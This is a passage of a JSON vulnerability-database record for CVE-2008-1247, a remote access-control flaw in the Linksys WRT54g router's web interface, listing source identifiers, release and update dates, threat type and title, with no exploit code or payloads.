        "id": "VHN-31372"
      },
      {
        "db": "BID",
        "id": "28381"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "db": "PACKETSTORM",
        "id": "64904"
      },
      {
        "db": "PACKETSTORM",
        "id": "64785"
      },
      {
        "db": "PACKETSTORM",
        "id": "67644"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2008-03-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-31372"
      },
      {
        "date": "2008-03-10T00:00:00",
        "db": "BID",
        "id": "28381"
      },
      {
        "date": "2012-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "date": "2008-03-26T21:47:04",
        "db": "PACKETSTORM",
        "id": "64904"
      },
      {
        "date": "2008-03-21T21:12:32",
        "db": "PACKETSTORM",
        "id": "64785"
      },
      {
        "date": "2008-06-24T19:34:03",
        "db": "PACKETSTORM",
        "id": "67644"
      },
      {
        "date": "2008-03-10T17:44:00",
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "date": "2008-03-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-31372"
      },
      {
        "date": "2009-04-29T20:56:00",
        "db": "BID",
        "id": "28381"
      },
      {
        "date": "2012-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "date": "2018-10-11T20:31:17.277000",
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "date": "2008-09-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linksys WRT54g On the router  Web Vulnerability to execute arbitrary administrator operations in the interface",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ],
    "trust": 0.6
  }
}

